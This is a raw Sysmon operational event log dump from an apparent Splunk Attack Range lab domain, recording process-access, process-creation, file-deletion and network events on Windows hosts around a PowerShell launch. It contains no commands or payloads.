08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.107{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.107{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.107{466BC892-F7DB-60EB-DD7D-00000000CF01}61208124C:\Windows\system32\conhost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.085{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-6F0B-00000000CF01}7076C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x80000000000000001054012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.060{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.045{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.045{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.007{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.007{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:48.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE37301E7EAEBBEAB9782800B6B6BDC6,SHA256=305DA9C8DB453A23661151D5C5B9627885503290F26F7B3A15DF3FFA100B3E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:48.724{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E745E4EBDB66FD8B08E7932698BC9AEF,SHA256=C8F46E56F7D88C11FDA8853244F930B60BA80CC0B30352370556BE0F0B037F74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:48.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E41B54872A63D628198FC56534B8B49C,SHA256=5BAF16538FFB6871477F877220D9E2BF6243E36A32B1A6464D6F0867AE0F58E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.689{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61939-false10.0.1.12-8000- 23542300x8000000000000000810031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:49.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51880139D1440972E7F12F5D5CCA447,SHA256=922E570F4156050682B88C71AA5CE3C20675E8EDEC27A001E711B49EEE55F239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:49.744{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D2938110F72FB37A3DA512BD3AA3B0,SHA256=E1B95E739A972B06215BED21787722AFE76C6BB0D92A73BAC528F0B318040BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E52D4AC69D6E1BC9220B2EB57B1C912,SHA256=57E7DF142C02EF436E3605C244F4E7F8A301F3DAC4CA5676CBB2026006C4ADF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.909{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.878{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.862{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 